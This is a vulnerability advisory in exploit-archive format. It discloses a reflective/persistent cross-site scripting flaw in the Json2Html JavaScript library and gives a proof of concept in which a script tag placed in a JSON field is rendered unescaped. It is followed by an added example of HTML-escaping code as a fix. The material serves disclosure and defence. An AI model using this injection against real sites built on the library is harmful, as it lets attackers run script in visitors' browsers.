# Exploit Title: Json2Html Javascript Library - Reflective/Persistent XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://json2html.com/
# Software Link: https://github.com/moappi/json2html/archive/master.zip
# Platform: Javascript
Json2Html is a pure JavaScript library that transforms JSON to HTML and is
used as a jQuery plugin, as well as a Node.js package.
The issue lies in there being no sanitization when the conversion between
the two occurs. For example:
Proof of concept:
var transform = {'<>':'li','html':'${name} (${age})'};
var data = [
{'name':'Bob','age':40},
{'name':"<script>alert('XSS')</script>",'age':34}
];
and then transformed...
<html>
<li>
Bob (40)
</li>
<li>
<script>alert('XSS')</script> (34)
</li>
</html>
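
A defensive counterpart to the proof of concept above, as an added example that is not part of the original advisory or the json2html code base: untrusted values are HTML-escaped before they are substituted into the template. `renderItem`/`render` are a simplified stand-in for the library's `${field}` substitution, and `escapeHtml`/`escapeData` are hypothetical helper names.

```javascript
// Added example: escape untrusted values before they reach an HTML template.
// renderItem() is a simplified stand-in for the library's ${field} substitution,
// written for this example only; it is not json2html code.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Recursively escape every string leaf so nested objects and arrays are covered.
function escapeData(value) {
  if (typeof value === 'string') return escapeHtml(value);
  if (Array.isArray(value)) return value.map(escapeData);
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) out[key] = escapeData(value[key]);
    return out;
  }
  return value; // numbers, booleans, null, undefined pass through unchanged
}

// Stand-in renderer: handles only the {'<>': tag, 'html': template} form from the PoC.
function renderItem(transform, item) {
  const tag = transform['<>'];
  const body = transform.html.replace(/\$\{(\w+)\}/g, (_, field) =>
    item[field] === undefined ? '' : String(item[field]));
  return `<${tag}>${body}</${tag}>`;
}

function render(transform, data) {
  return data.map((item) => renderItem(transform, item)).join('');
}

// Constructed sample input, same shape as the proof of concept.
const transform = { '<>': 'li', 'html': '${name} (${age})' };
const data = [
  { name: 'Bob', age: 40 },
  { name: "<script>alert('XSS')</script>", age: 34 },
];

const unsafeHtml = render(transform, data);           // markup from data survives
const safeHtml = render(transform, escapeData(data)); // markup is neutralised

console.log(unsafeHtml);
console.log(safeHtml);
```

Escaping of this kind covers element content and quoted attribute values; values placed in URL attributes, event-handler attributes or script blocks need context-specific handling.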